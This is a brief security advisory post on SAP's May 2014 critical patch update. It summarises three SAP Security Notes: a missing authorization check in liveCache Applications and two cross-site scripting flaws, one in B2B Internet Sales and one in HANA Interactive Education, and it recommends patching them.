SAP released its monthly critical patch update for May 2014 which closes a few vulnerabilities in SAP products.
The most critical issues
Some of our readers and clients asked us to categorize the most critical SAP vulnerabilities to patch them first. The companies that provide SAP Security Assessment, SAP Vulnerability Assessment, or SAP Penetration Testing services can include these vulnerabilities in their checklists.
The most critical issues of this update can be patched by the following SAP Security Notes:
- 1889999: A Missing Authorization Check vulnerability in the SAP liveCache Applications. An attacker can use some functions of LCAPPS DP access to which should be restricted. This may result in the privilege escalation.
- 1979438: An XSS vulnerability in SAP Business-to-Business Internet Sales. An attacker can modify the displayed application content without authorization and steal the authentication data (cookie).
- 2009696: An XSS vulnerability in SAP HANA Interactive Education. An attacker can modify the displayed application content without authorization and steal the authentication data (cookie).
It is highly recommended to patch all those issues to prevent business risks.
SAP traditionally published acknowledgements for the found vulnerabilities to security researchers on their acknowledgement page.
Checks for the issues are already available in ERPScan Security Monitoring Suite.